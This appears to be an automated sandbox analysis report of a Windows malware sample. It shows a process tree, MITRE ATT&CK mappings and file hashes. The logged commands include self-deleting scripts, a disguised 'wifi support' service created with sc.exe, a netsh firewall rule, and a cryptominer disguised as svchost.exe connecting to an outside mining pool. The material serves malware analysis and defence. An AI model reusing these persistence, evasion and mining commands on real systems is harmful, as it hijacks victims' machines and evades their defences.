C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"4⤵
- Views/modifies file attributes
PID:7856
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:4624
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEB96.bat"4⤵
- Views/modifies file attributes
PID:3480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEB96.bat" "4⤵PID:4000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵
- Blocklisted process makes network request
PID:2400
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6852
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4352
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:4688 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4deca2e7-8b7b-054c-9857-667aa038a20e}\oemvista.inf" "9" "4d14a44ff" "0000000000000128" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:6896
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000128"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6696
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:2020
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:4824
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6348
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:7848 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Suspicious use of SetWindowsHookEx
PID:5336
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7268
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5252
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7456
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8104
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5084
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6280
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:7648
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2232
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7592
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1092
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2964
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\e5966b7df7c2460eaec41c00094a9fcc /t 396 /p 61121⤵PID:6504
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\b64387eb221246a99271adb52119c26a /t 7936 /p 29641⤵PID:8300
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6360
-
C:\Users\Admin\AppData\Local\Temp\63BF.exeC:\Users\Admin\AppData\Local\Temp\63BF.exe1⤵PID:9012
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\80b5ca2a-efdd-4f40-a449-57f2448d0017" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:8572
-
-
C:\Users\Admin\AppData\Local\Temp\63BF.exe"C:\Users\Admin\AppData\Local\Temp\63BF.exe" --Admin IsNotAutoStart IsNotTask2⤵PID:8312
-
C:\Users\Admin\AppData\Local\da9e0d13-6520-48ae-93b9-8c6f7023fa6d\updatewin.exe"C:\Users\Admin\AppData\Local\da9e0d13-6520-48ae-93b9-8c6f7023fa6d\updatewin.exe"3⤵PID:8148
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\da9e0d13-6520-48ae-93b9-8c6f7023fa6d\updatewin.exe4⤵PID:6892
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
PID:8740
-
-
-
-
C:\Users\Admin\AppData\Local\da9e0d13-6520-48ae-93b9-8c6f7023fa6d\5.exe"C:\Users\Admin\AppData\Local\da9e0d13-6520-48ae-93b9-8c6f7023fa6d\5.exe"3⤵PID:4736
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\da9e0d13-6520-48ae-93b9-8c6f7023fa6d\5.exe" & del C:\ProgramData\*.dll & exit4⤵PID:5644
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f5⤵
- Kills process with taskkill
PID:4964
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:9460
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9076
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\1ac0aab74bae4d45a070801f9d2b4932 /t 0 /p 90761⤵PID:8868
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\43147cccd1e44961b472fd654ee40aae /t 7100 /p 63601⤵PID:7504
-
C:\Users\Admin\AppData\Local\Temp\A54D.exeC:\Users\Admin\AppData\Local\Temp\A54D.exe1⤵PID:6068
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im A54D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\A54D.exe" & del C:\ProgramData\*.dll & exit2⤵PID:6200
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im A54D.exe /f3⤵
- Kills process with taskkill
PID:6136
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:6516
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8972
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7760
-
C:\Users\Admin\AppData\Local\Temp\B0D.exeC:\Users\Admin\AppData\Local\Temp\B0D.exe1⤵PID:7316
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\iymknejf\2⤵PID:8652
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gcuurgft.exe" C:\Windows\SysWOW64\iymknejf\2⤵PID:5640
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create iymknejf binPath= "C:\Windows\SysWOW64\iymknejf\gcuurgft.exe /d\"C:\Users\Admin\AppData\Local\Temp\B0D.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:3116
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description iymknejf "wifi internet conection"2⤵PID:9100
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start iymknejf2⤵PID:2044
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:6320
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\42a98946413b475ba3837db28c37a00b /t 8824 /p 89721⤵PID:6656
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\641859af0ed44c3681eadcee49eb8d4c /t 7768 /p 77601⤵PID:6124
-
C:\Users\Admin\AppData\Local\Temp\55A4.exeC:\Users\Admin\AppData\Local\Temp\55A4.exe1⤵PID:7220
-
C:\Users\Admin\AppData\Local\Temp\55A4.exe"{path}"2⤵PID:8920
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" "8920" "C:\Users\Admin\AppData\Local\Temp\55A4.exe""3⤵PID:5792
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID "8920"4⤵
- Kills process with taskkill
PID:10224
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 34⤵PID:4600
-
-
-
-
C:\Windows\SysWOW64\iymknejf\gcuurgft.exeC:\Windows\SysWOW64\iymknejf\gcuurgft.exe /d"C:\Users\Admin\AppData\Local\Temp\B0D.exe"1⤵PID:7920
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:8456
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k3⤵PID:9244
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8744
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3140
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10056
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\d262eb1365764e0ca9e156634661e7cd /t 8336 /p 100561⤵PID:9376
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9676
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10180
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3732
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9812
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7660
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5720
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4081⤵PID:7676
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8892
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7596
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9572
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10936
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10364
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10316
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9116
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9832
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9756
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:11256
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:10964
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6772
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6100
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8908
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7936
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6824
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7612
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9208
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:816
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:11076
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6232
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7192
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:8528
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8036
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10616
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4880
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5540
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:6016
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10324
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2124
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8392
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5212
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:10624
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6264
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10364
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10764
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Hidden Files and Directories
1Install Root Certificate
1Modify Registry
3Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
c5b208e7a66ad710218fc43225f27781
SHA161fbed7f915776b6c2b53584748db8ff8251be4f
SHA25609dd8ec916de90a20af0b0f15e2c6104e32c292eefefb7cf98b9ae4353eb8ec4
SHA512d234f040770250ef0b68db6d4a2f86d7c55ee9e6f66f85881efbd61bebd056221e0f0ef246c461ecc1a4efd01c0f78477bf30b0525d11e3a463206f4e5123fd2
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e